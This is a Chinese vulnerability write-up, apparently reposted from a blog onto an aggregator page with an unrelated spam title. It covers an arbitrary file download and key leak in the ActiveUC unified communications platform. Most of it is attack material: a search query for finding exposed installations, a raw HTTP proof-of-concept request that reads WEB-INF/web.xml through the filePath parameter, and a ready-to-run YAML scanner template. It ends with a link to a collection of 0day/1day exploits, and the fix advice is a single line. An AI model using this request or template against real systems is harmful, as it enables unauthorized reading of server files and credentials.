您的位置:首页 > 健康 > 养生 > 十大禁止安装应用入口在哪里_企业策划案_制作网站教程_中国移动有免费的视频app

十大禁止安装应用入口在哪里_企业策划案_制作网站教程_中国移动有免费的视频app

2024/10/9 0:17:49 来源:https://blog.csdn.net/qq_48368964/article/details/142765599  浏览:    关键词:十大禁止安装应用入口在哪里_企业策划案_制作网站教程_中国移动有免费的视频app
十大禁止安装应用入口在哪里_企业策划案_制作网站教程_中国移动有免费的视频app


》》》产品描述《《《

        网动统一通信平台是采用统一的通信界面,将VoIP电话系统、电子邮件等多种沟通方式融合的企业IT平台。


》》》漏洞描述《《《

        网动统一通信平台是采用统一的通信界面,将VoIP电话系统、电子邮件等多种沟通方式融合的企业IT平台。网动统一通信平台(ActiveUC)存在任意文件读取下载、未授权密钥泄露。


》》》搜索语句《《《

title="网动统一通信平台(Active UC)"


》》》漏洞复现《《《

poc

GET /acenter/meetingShow!downloadDocument.action?filePath=WEB-INF/web.xml HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Connection: close

yaml

id: 网动统一通信平台/网动统一通信平台ActiveUC存在任意文件下载漏洞info:name: author: Kelichenseverity: description: http:- raw:- |GET /acenter/meetingShow!downloadDocument.action?filePath=WEB-INF/web.xml HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateUpgrade-Insecure-Requests: 1Connection: closematchers-condition: andmatchers:- type: wordwords:- "<web-app"- "<servlet>"- "<servlet-mapping>"

》》》修复建议《《《

关闭互联网接口


-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

更多最新0day/1day POC&EXP移步----->Kelichen1113/POC-EXP (github.com)

-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com